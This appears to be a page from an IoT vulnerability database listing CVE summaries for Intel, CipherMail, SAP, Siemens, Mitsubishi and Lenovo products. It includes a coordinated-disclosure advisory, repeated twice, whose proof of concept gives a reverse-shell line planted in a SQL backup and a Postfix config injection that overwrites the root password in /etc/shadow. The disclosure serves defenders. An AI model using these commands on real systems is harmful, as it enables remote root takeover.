VARIoT IoT vulnerabilities database

Out-of-bounds write in subsystem for Intel(R) CSME versions before 12.0.64, 13.0.32, 14.0.33 and 14.5.12 may allow a privileged user to potentially enable escalation of privilege via local access. Intel(R) CSME Is vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Intel Converged Security and Management Engine (CSME) is a security management engine of Intel Corporation. A buffer error vulnerability exists in a subsystem in Intel CSME. A local attacker could exploit this vulnerability to elevate privileges. The following products and versions are affected: Intel CSME versions prior to 12.0.64, versions prior to 13.0.32, versions prior to 14.0.33, and versions prior to 14.5.12

Integer overflow in subsystem for Intel(R) CSME versions before 11.8.77, 11.12.77, 11.22.77 and Intel(R) TXE versions before 3.1.75, 4.0.25 and Intel(R) Server Platform Services (SPS) versions before SPS_E5_04.01.04.380.0, SPS_SoC-X_04.00.04.128.0, SPS_SoC-A_04.00.04.211.0, SPS_E3_04.01.04.109.0, SPS_E3_04.08.04.070.0 may allow a privileged user to potentially enable denial of service via local access. Intel Converged Security and Management Engine (CSME) and others are products of Intel Corporation of the United States. Intel Converged Security and Management Engine is a security management engine. Intel TXE is a trusted execution engine with hardware authentication function used in CPU (Central Processing Unit). Subsystems in Intel CSME, TXE, and SPS have security vulnerabilities. A local attacker could exploit this vulnerability to cause a denial of service. The following products and versions are affected: Intel CSME before 11.8.77, before 11.12.77, before 11.22.77; TXE before 3.1.75, before 4.0.25; SPS SPS_E5_04.01.04.380.0 before, SPS_SoC Versions before -X_04.00.04.128.0, versions before SPS_SoC-A_04.00.04.211.0, versions before SPS_E3_04.01.04.109.0, versions before SPS_E3_04.08.04.070.0

Improper Access Control in subsystem for Intel(R) TXE versions before 3.175 and 4.0.25 may allow an unauthenticated user to potentially enable escalation of privilege via physical access. Intel(R) TXE Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Intel TXE is a trusted execution engine with hardware verification function in the CPU (Central Processing Unit) of Intel Corporation of the United States. There are security vulnerabilities in the subsystems of Intel TXE versions prior to 3.175 and versions prior to 4.0.25. An attacker in physical proximity could exploit this vulnerability to elevate privileges

An issue was discovered in CipherMail Community Gateway and Professional/Enterprise Gateway 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger 1.1.1 through 3.1.1-0. Attackers with administrative access to the web interface have multiple options to escalate their privileges to the Unix root account. CipherMail Gateway and Webmail Messenger Exists in a privilege management vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. CipherMail Webmail Messenger is a CipherMail encrypted gateway's Webmail Add-ons. An attacker could exploit this vulnerability to elevate privileges to root . An attacker can exploit this vulnerability by implementing a man-in-the-middle attack to compromise the communication between the CipherMail product and an external SMTP client. CipherMail Multiple Vulnerabilities 1. Advisory Information Title: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities Advisory ID: CORE-2020-0008 Advisory URL: https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities Date published: 2020-05-28 Date of last update: 2020-05-28 Vendors contacted: CipherMail Release mode: Coordinated release 2. Vulnerability Information Class: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2020-12713 , CVE-2020-12714 3. Vulnerability Description CipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools. CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1] Two vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance, which would allow a remote attacker with access to the management console and administrator rights to execute arbitrary privilege commands on the operating system. 4. Vulnerable Packages CipherMail Community Virtual Appliance version 4.6.2. Other products and versions might be affected, but have not yet been tested. 5. Vendor Information, Solutions, and Workarounds The following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2 Patch instructions for older releases are also available. 6. Credits This vulnerability was discovered and researched by Iván Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services. The publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team. 7. Technical Description / Proof of Concept Code CipherMail Community Virtual Appliance is an open souce virtual appliance version of the Email Encryption Gateway. It is designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services. Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system. 7.1 Remote Command Execution Via Backup Restore [CVE-2020-12713] Ciphermail Web Management console provides a system backup functionality only accessible by the administrator's role which allows them to backup or restore the system settings. This capability can be affected by a remote code execution vulnerability. The following proof of concept demonstrates the vulnerability: 1. First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files. 2. The obtained file should then be decompressed. The word system can then be added, followed by the command that is going to be executed at the end of the SQL statements file. Below is a snippet using system to obtain a reverse shell: -- MySQL dump 10.16 Distrib 10.2.21-MariaDB, for Linux (x86_64) -- -- Host: localhost Database: djigzo -- ------------------------------------------------------ -- Server version 10.2.21-MariaDB [...] -- -- Dumping data for table `cm_users` -- LOCK TABLES `cm_users` WRITE; /*!40000 ALTER TABLE `cm_users` DISABLE KEYS */; INSERT INTO `cm_users` VALUES (1,'susucutrule@mailinator.com',5); /*!40000 ALTER TABLE `cm_users` ENABLE KEYS */; UNLOCK TABLES; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; system bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1 -- Dump completed on 2019-03-28 18:48:05 3. It is then necessary to recompress the recently modified file along with the other ones within a new tar.gz file and execute restore backup functionality from the administration console. 4. Finally, the command can be executed in the backend server and a reverse shell should be obtained. The reverse shell is executed under the context of the user running the database server. 7.2 Configuration File Injection Leading to Code Execution as Root [CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator's role to manage Postfix. It is possible to edit Postfix’s main.cf configuration file within the CipherMail Web Management console and add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file. The following proof of concept demonstrates the vulnerability: The next four lines should be added in order to replace the root password in the system: [main.cf Postfix configuration file] […] always_bcc = johnny@test.com multi_instance_enable=yes multi_instance_wrapper=sed -i /root:/c\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow multi_instance_directories=/tmp […] After the new main.cf file is saved, the Postfix service is automatically restarted and the file pointed by multi_instance_wrapper is executed. In this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by main.cf syntax (syntax is limited and some symbols are not allowed, including "<", ">", "|", among others). To generate a password in DES using bash, we first executed the following command: $ mkpasswd -m des Password: pentest KoVhDRK7oesZg As shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest. It is now possible to establish a SSH connection (the SSH server is enabled by default) and log in as the root user with the new password set. 8. Report Timeline 2020-04-07 - Vulnerability discovered by CoreLabs. 2020-04-30 - First contact made with the vendor. 2020-04-30 - Answer received and advisory draft provided to CipherMail. 2020-04-30 - Vulnerabilities recognized by the vendor. 2020-05-21 - CVEs requested and received from Mitre. 2020-05-28 - Fix and release changes published by vendor. 2020-05-28 - Advisory published. 9. References [1] https://www.ciphermail.com/ [2] https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html 10. About CoreLabs CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs. 11. About Core Security, A HelpSystems Company Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com. 12. Disclaimer The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

An issue was discovered in CipherMail Community Gateway Virtual Appliances and Professional/Enterprise Gateway Virtual Appliances versions 1.0.1 through 4.7.1-0 and CipherMail Webmail Messenger Virtual Appliances 1.1.1 through 3.1.1-0. A Diffie-Hellman parameter of insufficient size could allow man-in-the-middle compromise of communications between CipherMail products and external SMTP clients. CipherMail Gateway and Webmail Messenger There is a cryptographic strength vulnerability in.Information may be obtained. CipherMail Multiple Vulnerabilities 1. Advisory Information Title: CipherMail Email Encryption Gateway Community Virtual Appliance Multiple Vulnerabilities Advisory ID: CORE-2020-0008 Advisory URL: https://www.coresecurity.com/core-labs/advisories/ciphermail-multiple-vulnerabilities Date published: 2020-05-28 Date of last update: 2020-05-28 Vendors contacted: CipherMail Release mode: Coordinated release 2. Vulnerability Information Class: Improper Control of Generation of Code (Code Injection) [CWE-94], Improper Input Validation [CWE-20], Execution with Unnecessary Privileges [CWE-250] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2020-12713 , CVE-2020-12714 3. Vulnerability Description CipherMail is a global cybersecurity company based in the Netherlands focused on email security products. CipherMail creates both commercial solutions and sponsors open source tools. CipherMail Email Encryption Gateway can be deployed with any email system and uses multiple encryption standards to provide message integrity and protection against interception. Both an enterprise edition and an open source community version are available. [1] Two vulnerabilities were found in version 4.6.2 of the Community Virtual Appliance, which would allow a remote attacker with access to the management console and administrator rights to execute arbitrary privilege commands on the operating system. 4. Other products and versions might be affected, but have not yet been tested. 5. Vendor Information, Solutions, and Workarounds The following versions have been published to correct the vulnerabilities: CipherMail Gateway 4.8 and Webmail Messenger 3.2 Patch instructions for older releases are also available. 6. Credits This vulnerability was discovered and researched by Iván Koiffman, Fernando Catoira and Fernando Diaz from Core Security Consulting Services. The publication of this advisory was coordinated by Pablo A. Zurro from the CoreLabs Advisories Team. 7. It is designed to be deployed inside the organization's network infrastructure. It comes bundled with a Web Management Console to manage domains, users, DLP policies, and other services. Multiple vulnerabilities were found in the context of this appliance, which could allow a remote attacker to compromise the system. Vulnerabilities described in 7.1 and 7.2 could allow an attacker to obtain command execution on the system. 7.1 Remote Command Execution Via Backup Restore [CVE-2020-12713] Ciphermail Web Management console provides a system backup functionality only accessible by the administrator's role which allows them to backup or restore the system settings. This capability can be affected by a remote code execution vulnerability. The following proof of concept demonstrates the vulnerability: 1. First, the create backup functionality, which is present in the path /admin/backup/create, must be invoked in order to download the system settings. This feature downloads a compressed file containing SQL statements and some other files. 2. The obtained file should then be decompressed. The word system can then be added, followed by the command that is going to be executed at the end of the SQL statements file. Below is a snippet using system to obtain a reverse shell: -- MySQL dump 10.16 Distrib 10.2.21-MariaDB, for Linux (x86_64) -- -- Host: localhost Database: djigzo -- ------------------------------------------------------ -- Server version 10.2.21-MariaDB [...] -- -- Dumping data for table `cm_users` -- LOCK TABLES `cm_users` WRITE; /*!40000 ALTER TABLE `cm_users` DISABLE KEYS */; INSERT INTO `cm_users` VALUES (1,'susucutrule@mailinator.com',5); /*!40000 ALTER TABLE `cm_users` ENABLE KEYS */; UNLOCK TABLES; /*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */; /*!40101 SET SQL_MODE=@OLD_SQL_MODE */; /*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */; /*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */; /*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */; /*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */; /*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */; /*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */; system bash -i >& /dev/tcp/[Attacker IP]/[Attacker Port] 0>&1 -- Dump completed on 2019-03-28 18:48:05 3. It is then necessary to recompress the recently modified file along with the other ones within a new tar.gz file and execute restore backup functionality from the administration console. 4. Finally, the command can be executed in the backend server and a reverse shell should be obtained. The reverse shell is executed under the context of the user running the database server. 7.2 Configuration File Injection Leading to Code Execution as Root [CVE-2020-12714] The CipherMail Web Management console provides a functionality accessible by users with an administrator's role to manage Postfix. It is possible to edit Postfix’s main.cf configuration file within the CipherMail Web Management console and add a "BCC Address for all Messages". This configuration parameter is written verbatim to the appliance's Postfix main.cf configuration file. The following proof of concept demonstrates the vulnerability: The next four lines should be added in order to replace the root password in the system: [main.cf Postfix configuration file] […] always_bcc = johnny@test.com multi_instance_enable=yes multi_instance_wrapper=sed -i /root:/c\root:KoVhDRK7oesZg:17926:0:99999:7::: /etc/shadow multi_instance_directories=/tmp […] After the new main.cf file is saved, the Postfix service is automatically restarted and the file pointed by multi_instance_wrapper is executed. In this proof of concept, we were able to execute a sed command to set the password of the root user to pentest. Note that we used DES and not bcrypt because the $ symbol is not allowed by main.cf syntax (syntax is limited and some symbols are not allowed, including "<", ">", "|", among others). To generate a password in DES using bash, we first executed the following command: $ mkpasswd -m des Password: pentest KoVhDRK7oesZg As shown above, we used the obtained string KoVhDRK7oesZg as part of the sed command to set the password of the root user to pentest. It is now possible to establish a SSH connection (the SSH server is enabled by default) and log in as the root user with the new password set. 8. Report Timeline 2020-04-07 - Vulnerability discovered by CoreLabs. 2020-04-30 - First contact made with the vendor. 2020-04-30 - Answer received and advisory draft provided to CipherMail. 2020-04-30 - Vulnerabilities recognized by the vendor. 2020-05-21 - CVEs requested and received from Mitre. 2020-05-28 - Fix and release changes published by vendor. 2020-05-28 - Advisory published. 9. References [1] https://www.ciphermail.com/ [2] https://www.ciphermail.com/blog/ciphermail-cve-2020-12713_2020-12714.html 10. About CoreLabs CoreLabs, the research center of Core Security, A HelpSystems Company is charged with researching and understanding security trends as well as anticipating the future requirements of information security technologies. CoreLabs studies cybersecurity trends, focusing on problem formalization, identification of vulnerabilities, novel solutions, and prototypes for new technologies. The team is comprised of seasoned researchers who regularly discover and discloses vulnerabilities, informing product owners in order to ensure a fix can be released efficiently, and that customers are informed as soon as possible. CoreLabs regularly publishes security advisories, technical papers, project information, and shared software tools for public use at https://www.coresecurity.com/core-labs. 11. About Core Security, A HelpSystems Company Core Security, a HelpSystems Company, provides organizations with critical, actionable insight about who, how, and what is vulnerable in their IT environment. With our layered security approach and robust threat-aware, identity & access, network security, and vulnerability management solutions, security teams can efficiently manage security risks across the enterprise. Learn more at www.coresecurity.com. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@helpsystems.com. 12. Disclaimer The contents of this advisory are copyright (c) 2020 Core Security and (c) 2020 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

GX Work2 is a PLC programming software developed by Mitsubishi Electric Automation Co., Ltd. It is a programming tool dedicated to PLC design, debugging, and maintenance. Compared with the traditional GX Developer software, it has improved functions and operating performance and has become easier to use. GX Works2 has a denial of service vulnerability. When an attacker clicks on the PLC online read function, the malformed data sent by the PLC to GX Work2 through a private protocol causes a heap overflow vulnerability, which leads to a denial of service and may cause remote code execution.

SAP Netweaver AS ABAP, versions 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, are vulnerable for Server Side Request Forgery Attack where in an attacker can use inappropriate path names containing malicious server names in the import/export of sessions functionality and coerce the web server into authenticating with the malicious server. Furthermore, if NTLM is setup the attacker can compromise confidentiality, integrity and availability of the SAP database. SAP Netweaver AS ABAP Contains a server-side request forgery vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state

SAP NetWeaver AS ABAP (Banking Services), versions - 710, 711, 740, 750, 751, 752, 75A, 75B, 75C, 75D, 75E, does not perform necessary authorization checks for an authenticated user due to Missing Authorization Check, allowing wrong and unexpected change of individual conditions by a malicious user leading to wrong prices. SAP NetWeaver AS ABAP (Banking Services) Exists in a vulnerability related to lack of authentication.Information may be obtained and tampered with

A potential vulnerability in the SMI callback function used in the System Lock Preinstallation driver in some Lenovo Notebook and ThinkStation models may allow arbitrary code execution. plural Lenovo Notebook and ThinkStation There are unspecified vulnerabilities in the model.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state

A vulnerability has been identified in SIMATIC Automation Tool (All versions < V4 SP2), SIMATIC NET PC Software V14 (All versions < V14 SP1 Update 14), SIMATIC NET PC Software V15 (All versions), SIMATIC NET PC Software V16 (All versions < V16 Upd3), SIMATIC PCS neo (All versions < V3.0 SP1), SIMATIC ProSave (All versions < V17), SIMATIC S7-1500 Software Controller (All versions < V21.8), SIMATIC STEP 7 (TIA Portal) V13 (All versions < V13 SP2 Update 4), SIMATIC STEP 7 (TIA Portal) V14 (All versions < V14 SP1 Update 10), SIMATIC STEP 7 (TIA Portal) V15 (All versions < V15.1 Update 5), SIMATIC STEP 7 (TIA Portal) V16 (All versions < V16 Update 2), SIMATIC STEP 7 V5 (All versions < V5.6 SP2 HF3), SIMATIC WinCC OA V3.16 (All versions < V3.16 P018), SIMATIC WinCC OA V3.17 (All versions < V3.17 P003), SIMATIC WinCC Runtime Advanced (All versions < V16 Update 2), SIMATIC WinCC Runtime Professional V13 (All versions < V13 SP2 Update 4), SIMATIC WinCC Runtime Professional V14 (All versions < V14 SP1 Update 10), SIMATIC WinCC Runtime Professional V15 (All versions < V15.1 Update 5), SIMATIC WinCC Runtime Professional V16 (All versions < V16 Update 2), SIMATIC WinCC V7.4 (All versions < V7.4 SP1 Update 14), SIMATIC WinCC V7.5 (All versions < V7.5 SP1 Update 3), SINAMICS STARTER (All Versions < V5.4 HF2), SINAMICS Startdrive (All Versions < V16 Update 3), SINEC NMS (All versions < V1.0 SP2), SINEMA Server (All versions < V14 SP3), SINUMERIK ONE virtual (All Versions < V6.14), SINUMERIK Operate (All Versions < V6.14). A common component used by the affected applications regularly calls a helper binary with SYSTEM privileges while the call path is not quoted. This could allow a local attacker to execute arbitrary code with SYTEM privileges. plural SIMATIC The product contains vulnerabilities in unquoted search paths or elements.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Opera Software, Opera, etc. are all products of Opera Software in Norway. Opera is a web browser, Siemens SIMATIC S7-1500, etc. are all products of German Siemens (Siemens). SIMATIC S7-1500 is a programmable logic controller. SIMATIC WinCC is an automated data acquisition and monitoring (SCADA) system. Code issue vulnerabilities exist in several products. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products

A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.0 (All versions < V9.0 SP3), SIMATIC PDM (All versions < V9.2), SIMATIC STEP 7 V5.X (All versions < V5.6 SP2 HF3), SINAMICS STARTER (containing STEP 7 OEM version) (All versions < V5.4 HF2). A buffer overflow vulnerability could allow a local attacker to cause a Denial-of-Service situation. The security vulnerability could be exploited by an attacker with local access to the affected systems. Successful exploitation requires user privileges but no user interaction. The vulnerability could allow an attacker to compromise the availability of the system as well as to have access to confidential information. Multiple Siemens products are vulnerable to out-of-bounds writes.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. A buffer error vulnerability exists in several Siemens products

A vulnerability has been identified in LOGO! 8 BM (incl. SIPLUS variants) (All versions). The vulnerability could lead to an attacker reading and modifying the device configuration and obtain project files from affected devices. The security vulnerability could be exploited by an unauthenticated attacker with network access to port 135/tcp. No user interaction is required to exploit this security vulnerability. The vulnerability impacts confidentiality, integrity, and availability of the device. At the time of advisory publication no public exploitation of this security vulnerability was known. LOGO!8 BM (incl. SIPLUS variants) Exists in the lack of authentication for critical featuresInformation may be obtained and tampered with. Siemens LOGO! 8 BM is a programmable logic controller of Siemens (Siemens) in Germany. There is an access control error vulnerability in Siemens LOGO! 8 BM (all versions), which stems from the lack of ID verification in the program

Mitsubishi MELSEC iQ-R Series PLCs with firmware 33 allow attackers to halt the industrial process by sending an unauthenticated crafted packet over the network, because this denial of service attack consumes excessive CPU time. After halting, physical access to the PLC is required in order to restore production. Provided by Mitsubishi Electric Corporation MELSEC iQ-R Resource exhaustion vulnerabilities in series units (CWE-400) Exists This vulnerability information is provided by the developer for the purpose of making it known to product users. JPCERT/CC Report to JPCERT/CC Coordinated with the developers.When a malicious packet is received from a remote third party, Ethernet Port communication interferes with service operation (DoS) It may be in a state. A reset is required for recovery. Misubishi Electric MELSEC iQ-R series is a programmable logic controller manufactured by Misubishi Electric, Japan

A potential vulnerability in the SMI callback function used in the EEPROM driver in some Lenovo Desktops and ThinkStation models may allow arbitrary code execution. plural Lenovo Desktop and ThinkStation There are unspecified vulnerabilities in the model.Information is obtained, information is tampered with, and service is disrupted (DoS) It may be put into a state

Improper input validation in DHCPv6 subsystem in Intel(R) AMT and Intel(R) ISM versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64 may allow an unauthenticated user to potentially enable information disclosure via network access. Intel(R) AMT and ISM There is an input verification vulnerability in.Information may be obtained. Both Intel Active Management Technology (AMT) and Intel Software Manager (ISM) are products of Intel Corporation of the United States. Intel Active Management Technology is a set of hardware-based computer remote active management technology software. Intel Software Manager is a utility for managing Intel software development products. A remote attacker could exploit this vulnerability to obtain information. The following products and versions are affected: Intel AMT before 11.8.77, before 11.12.77, before 11.22.77, before 12.0.64; ISM before 11.8.77, before 11.12.77, before 11.22.77 Version, version before 12.0.64

Improper input validation in subsystem for Intel(R) AMT versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64 may allow an unauthenticated user to potentially enable denial of service via network access. Intel(R) AMT There is an input verification vulnerability in.Service operation interruption (DoS) It may be put into a state. Intel Active Management Technology (AMT) is a set of hardware-based computer remote active management technology software developed by Intel Corporation. An attacker could exploit this vulnerability to cause a denial of service. The following products and versions are affected: Intel AMT versions prior to 11.8.77, versions prior to 11.12.77, versions prior to 11.22.77, and versions prior to 12.0.64

A vulnerability has been identified in SIMATIC PCS 7 V8.2 and earlier (All versions), SIMATIC PCS 7 V9.0 (All versions < V9.0 SP3), SIMATIC PDM (All versions < V9.2), SIMATIC STEP 7 V5.X (All versions < V5.6 SP2 HF3), SINAMICS STARTER (containing STEP 7 OEM version) (All versions < V5.4 HF2). A DLL Hijacking vulnerability could allow a local attacker to execute code with elevated privileges. The security vulnerability could be exploited by an attacker with local access to the affected systems. Successful exploitation requires user privileges but no user interaction. The vulnerability could allow an attacker to compromise the availability of the system as well as to have access to confidential information. Several Siemens products contain vulnerabilities in uncontrolled search path elements.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. A code issue vulnerability exists in several Siemens products

Improper buffer restrictions in subsystem for Intel(R) CSME versions before 12.0.64, 13.0.32, 14.0.33 and 14.5.12 may allow an authenticated user to potentially enable escalation of privilege, information disclosure or denial of service via local access. Intel(R) CSME Exists in a buffer error vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Intel Converged Security and Management Engine (CSME) is a security management engine of Intel Corporation. A security vulnerability exists in a subsystem in Intel CSME. Attackers can exploit this vulnerability to elevate privileges, causing information disclosure and denial of service. The following products and versions are affected: Intel CSME versions prior to 12.0.64, versions prior to 13.0.32, versions prior to 14.0.33, and versions prior to 14.5.12

Reversible one-way hash in Intel(R) CSME versions before 11.8.76, 11.12.77 and 11.22.77 may allow a privileged user to potentially enable escalation of privilege, denial of service or information disclosure via local access. Intel(R) CSME There is a vulnerability in the use of password hashes that is not strong enough.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be put into a state. Intel Converged Security and Management Engine (CSME) is a security management engine of Intel Corporation. Security vulnerabilities exist in Intel CSME versions prior to 11.8.76, versions prior to 11.12.77, and versions prior to 11.22.77

Improper input validation in Intel(R) AMT versions before 11.8.77, 11.12.77, 11.22.77 and 12.0.64 may allow an authenticated user to potentially enable information disclosure via network access. Intel(R) AMT There is an input verification vulnerability in.Information may be obtained. Intel Active Management Technology (AMT) is a set of hardware-based computer remote active management technology software developed by Intel Corporation. An attacker could exploit this vulnerability to obtain information. The following products and versions are affected: Intel AMT versions prior to 11.8.77, versions prior to 11.12.77, versions prior to 11.22.77, and versions prior to 12.0.64